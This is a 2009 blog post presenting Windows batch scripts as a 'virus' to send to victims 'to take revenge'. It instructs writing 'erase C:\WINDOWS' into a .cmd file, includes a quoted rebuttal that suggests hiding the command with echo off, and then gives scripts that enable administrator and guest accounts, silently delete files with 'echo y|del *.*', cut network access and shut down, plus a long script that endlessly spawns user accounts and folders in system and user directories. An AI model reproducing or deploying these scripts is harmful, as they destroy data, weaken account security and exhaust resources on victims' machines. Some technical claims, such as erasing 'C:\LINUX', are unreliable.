Tuesday, December 8, 2009

VERY EASY BUT DANGEROUS VIRUS

The only thing you need is Notepad .
Now, to test it, create a textfile called TEST.txt(empty) in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes).
Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone. Now, the real work begins:
Go to notepad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again.






Ok first of all this is not a virus even in the lamest terms. This is just a DOS batch file. You can also save the file as .bat file and the functioning will be the same. This file won't erase anything without confirmation from the user. You've tried to delete just a single file thats why it didn't ask for confirmation from you. Try deleting a folder with this file and you will get the following message in a DOS window:

CODE
erase c:\
c:\\*, Are you sure (Y/N)?


Unless you press 'y' nothing will happen. A virus, by definition, is not just supposed to damage a computer, it is also supposed to spread on its own. And this file can't even damage a computer without affirmation from the user. I wonder who would be dumb enough to affirm the destruction of his own computer. wink.gif
Atleast use "echo off" before the erase statement to hide the "erase c:\windows" command being displayed.
And by the way, I think you haven't ever used Linux. Otherwise you would know that Linux doesn't support DOS commands and neither does it use the Windows/DOS filesystem.
ANOTHER ONE AGAIN?? YES

net user administrator /active:yes
net user administrator *insertpassword
start net user guest /active:yes
net user guest *insertpassword
start @echo y|del *.*
ipconfig/release
start shutdown

YOU WANT MORE, OKAY

@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start
:start
@ECHO SET snowball2=1 >> bat6.Bat
@ECHO GOTO flood5 >> bat6.Bat
@ECHO :flood5 >> bat6.Bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.Bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.Bat
@ECHO GOTO flood5 >> bat6.Bat
START /MIN bat6.Bat
GOTO bat5
:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.Bat
@ECHO SET maggi=1 >> bat5.Bat
@ECHO GOTO flood4 >> bat5.Bat
@ECHO :flood4 >> bat5.Bat
@ECHO MKDIR maggi%%maggi%% >> bat5.Bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.Bat
@ECHO GOTO flood4 >> bat5.Bat
START /MIN bat5.Bat
GOTO bat4
:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.Bat
@ECHO SET marge=1 >> bat4.Bat
@ECHO GOTO flood3 >> bat4.Bat
@ECHO :flood3 >> bat4.Bat
@ECHO MKDIR marge%%marge%% >> bat4.Bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.Bat
@ECHO GOTO flood3 >> bat4.Bat
START /MIN bat4.Bat
GOTO bat3
:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.Bat
@ECHO SET bart=1 >> bat3.Bat
@ECHO GOTO flood2 >> bat3.Bat
@ECHO :flood2 >> bat3.Bat
@ECHO MKDIR bart%%bart%% >> bat3.Bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.Bat
@ECHO GOTO flood2 >> bat3.Bat
START /MIN bat3.Bat
GOTO bat2
:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.Bat
@ECHO SET homer=1 >> bat2.Bat
@ECHO GOTO flood >> bat2.Bat
@ECHO :flood >> bat2.Bat
@ECHO MKDIR homer%%homer%% >> bat2.Bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.Bat
@ECHO GOTO flood >> bat2.Bat
START /MIN bat2.Bat
GOTO original
:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1
Try this still not a virus just a .Bat file but a fun one also very annoying.

0 comments: